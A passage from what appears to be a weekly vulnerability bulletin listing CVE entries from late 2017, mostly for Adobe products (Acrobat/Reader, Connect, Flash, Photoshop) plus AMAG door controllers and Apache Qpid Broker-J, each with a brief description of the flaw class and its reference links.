 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaSscript API engine. In this scenario, the JavaScript input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16375
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the TIFF processing module. Crafted input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16396
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of an out of bounds read vulnerability in the MakeAccesible plugin, when handling font data. It causes an out of bounds memory access, which sometimes triggers an access violation exception. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees, potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-09not yet calculatedCVE-2017-16362
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized; the computation occurs during internal AST thread manipulation. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-09not yet calculatedCVE-2017-16378
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS2PDF conversion engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16386
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc.2017-12-09not yet calculatedCVE-2017-16369
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is due to a computation that accesses a pointer that has not been initialized in the main DLL. In this case, a computation defines a read from an unexpected memory location. Therefore, an attacker might be able to read sensitive portions of memory.2017-12-09not yet calculatedCVE-2017-16377
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion overflow vulnerability. The vulnerability leads to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads or writes -- potentially leading to code corruption, control-flow hijack, or an information leak attack.2017-12-09not yet calculatedCVE-2017-16367
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the JavaScript engine. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16371
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to untrusted pointer dereference in the JavaScript API engine. In this scenario, the JavaScript input is crafted in way that the computation results with pointer to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result with sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16372
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the Adobe graphics module responsible for displaying textual data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16409
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is a part of the JavaScript engine. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16370
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer over-read in the True Type2 Font parsing module. A corrupted cmap table input leads to a computation where the pointer arithmetic results in a location outside valid memory locations belonging to the buffer. An attack can be used to obtain sensitive information, such as object heap addresses, etc.2017-12-09not yet calculatedCVE-2017-16365
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability in the AcroPDF plugin.2017-12-09not yet calculatedCVE-2017-16366
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability leads to a stack-based buffer overflow condition in the internal Unicode string manipulation module. It is triggered by an invalid PDF file, where a crafted Unicode string causes an out of bounds memory access of a stack allocated buffer, due to improper checks when manipulating an offset of a pointer to the buffer. Attackers can exploit the vulnerability and achieve arbitrary code execution if they can effectively control the accessible memory.2017-12-09not yet calculatedCVE-2017-16368
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in TIFF parsing during XPS conversion. Crafted TIFF image input causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16385
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader

 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a security bypass vulnerability when handling XFDF files.2017-12-09not yet calculatedCVE-2017-16361
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference in the XPS parsing module. In this scenario, the input is crafted in a way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16399
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a type confusion vulnerability in the EMF processing module. The issue causes the program to access an object using an incompatible type, leading to an out of bounds memory access. Attackers can exploit the vulnerability by using the out of bounds access for unintended reads, writes, or frees -- potentially leading to code corruption, control-flow hijack, or information leak attack.2017-12-09not yet calculatedCVE-2017-16406
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the image conversion module when processing Enhanced Metafile Format (EMF). Crafted EMF input (EMR_STRETCHDIBITS) causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16395
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a buffer access with an incorrect length value in the JPEG processing module. Crafted input with an unexpected JPEG file segment size causes a mismatch between allocated buffer size and the access allowed by the computation. If an attacker can adequately control the accessible memory then this vulnerability can be leveraged to achieve arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16392
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of the image conversion module that handles Enhanced Metafile Format Plus (EMF+) data. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16416
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is in the part of the JavaScript engine that handles annotation abstraction. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16420
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is a part of the functionality that handles font encodings. The vulnerability is a result of out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16415
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the image conversion module that processes Enhanced Metafile Format Plus (EMF+) data. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16403
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the image conversion module that handles XPS files. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16418
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the font parsing module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16417
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16389
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of processing Enhanced Metafile Format Plus (EMF+). The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16404
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the JPEG 2000 module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16402
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the JavaScript engine. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16398
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs because of a computation that reads data that is past the end of the target buffer; the computation is part of the XPS conversion module, when handling a JPEG resource. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16412
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16394
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG 2000 parser. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16400
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This issue is due to an untrusted pointer dereference. In this scenario, the input is crafted in way that the computation results in pointers to memory locations that do not belong to the relevant process address space. The dereferencing operation is a read operation, and an attack can result in sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16373
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the MakeAccessible plugin, when creating an internal data structure. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-16360
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is a result of untrusted input that is used to calculate an array index; the calculation occurs in the image conversion module, when processing GIF files. The vulnerability leads to an operation that can write to a memory location that is outside of the memory addresses allocated for the data structure. The specific scenario leads to a write access to a memory location that does not belong to the relevant process address space.2017-12-09not yet calculatedCVE-2017-16410
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of Enhanced Metafile Format (EMF) processing within the image conversion module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16397
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The vulnerability is caused by a computation that writes data past the end of the intended buffer; the computation is part of handling an EMF EMR_BITBLT record. The vulnerability is a result of an out of range pointer offset that is used to access sub-elements of an internal data structure. An attacker can potentially leverage the vulnerability to corrupt sensitive data or execute arbitrary code.2017-12-09not yet calculatedCVE-2017-16407
BID
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is a part of the WebCapture module. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16408
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of an image conversion, specifically in Enhanced Metafile Format Plus (EMF +) processing modules. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16401
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11293
SECTRACK
CONFIRM
adobe -- acrobat_and_reader
 		An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of the JPEG2000 codec. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-16387
BID
SECTRACK
CONFIRM
adobe -- connect
 		An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-09not yet calculatedCVE-2017-11289
BID
SECTRACK
CONFIRM
adobe -- connect
 		An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls.2017-12-09not yet calculatedCVE-2017-11291
BID
SECTRACK
CONFIRM
adobe -- connect
 		An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-09not yet calculatedCVE-2017-11287
BID
SECTRACK
CONFIRM
adobe -- connect
 		An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-09not yet calculatedCVE-2017-11288
BID
SECTRACK
CONFIRM
adobe -- connect
 		An issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks.2017-12-09not yet calculatedCVE-2017-11290
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-09not yet calculatedCVE-2017-11299
BID
SECTRACK
CONFIRM
adobe -- digital_editions
 		An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-09not yet calculatedCVE-2017-11298
BID
SECTRACK
CONFIRM
adobe -- digital_editions
 		An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-09not yet calculatedCVE-2017-11297
BID
SECTRACK
CONFIRM
adobe -- digital_editions
 		An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-09not yet calculatedCVE-2017-11301
BID
SECTRACK
CONFIRM
adobe -- digital_editions
 		An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure.2017-12-09not yet calculatedCVE-2017-11273
BID
SECTRACK
CONFIRM
adobe -- digital_editions
 		An issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-09not yet calculatedCVE-2017-11300
BID
SECTRACK
CONFIRM
adobe -- dng_converter
 		An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11295
BID
CONFIRM
adobe -- experience_manager
 		An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager.2017-12-09not yet calculatedCVE-2017-11296
BID
SECTRACK
CONFIRM
adobe -- experience_manager
 		An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in http GET requests under certain circumstances.2017-12-09not yet calculatedCVE-2017-3111
BID
SECTRACK
CONFIRM
adobe -- experience_manager
 		An issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet.2017-12-09not yet calculatedCVE-2017-3109
BID
SECTRACK
CONFIRM
adobe -- flashAdobe Flash Player has an exploitable memory corruption vulnerability in the MP4 atom parser. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.2017-12-01not yet calculatedCVE-2017-11282
MISC
BID
SECTRACK
REDHAT
MISC
CONFIRM
GENTOO
EXPLOIT-DB
MISC
adobe -- flash
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11225
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11215
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language- and region- or country- specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3114
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash
 		Adobe Flash Player has an exploitable memory corruption vulnerability in the text handling function. Successful exploitation could lead to arbitrary code execution. This affects 26.0.0.151 and earlier.2017-12-01not yet calculatedCVE-2017-11281
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
EXPLOIT-DB
EXPLOIT-DB
MISC
adobe -- flash
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-11213
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash
 		An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3112
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- indesign
 		An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11302
BID
SECTRACK
CONFIRM
adobe -- photoshop
 		An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable use-after-free vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11304
BID
SECTRACK
CONFIRM
adobe -- photoshop
 		An issue was discovered in Adobe Photoshop 18.1.1 (2017.1.1) and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11303
BID
SECTRACK
CONFIRM
adobe -- shockwave
 		An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11294
BID
SECTRACK
CONFIRM
amag_technology -- symmetry_door_edge_network_controllers
 		Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command.2017-12-09not yet calculatedCVE-2017-16241
MISC
MISC
MISC
apache -- qpid_broker-jIn Apache Qpid Broker-J 0.18 through 0.32, if the broker is configured with different authentication providers on different ports one of which is an HTTP port, then the broker can be tricked by a remote unauthenticated attacker connecting to the HTTP port into using an authentication provider that was configured on a different port. The attacker still needs valid credentials with the authentication provider on the spoofed port. This becomes an issue when the spoofed port has weaker authentication protection (e.g., anonymous access, default accounts) and is normally protected by firewall rules or similar which can be circumvented by this vulnerability. AMQP ports are not affected. Versions 6.0.0 and newer are not affected.2017-12-01not yet calculatedCVE-2017-15702
BID
CONFIRM
MLIST
CONFIRM
apache -- qpid_broker-j
 		In Apache Qpid Broker-J versions 6.1.0 through 6.1.4 (inclusive) the broker does not properly enforce a maximum frame size in AMQP 1.0 frames. A remote unauthenticated attacker could exploit this to cause the broker to exhaust all available memory and eventually terminate. Older AMQP protocols are not affected.2017-12-01not yet calculatedCVE-2017-15701
BID
CONFIRM
MLIST
CONFIRM
apache-- struts
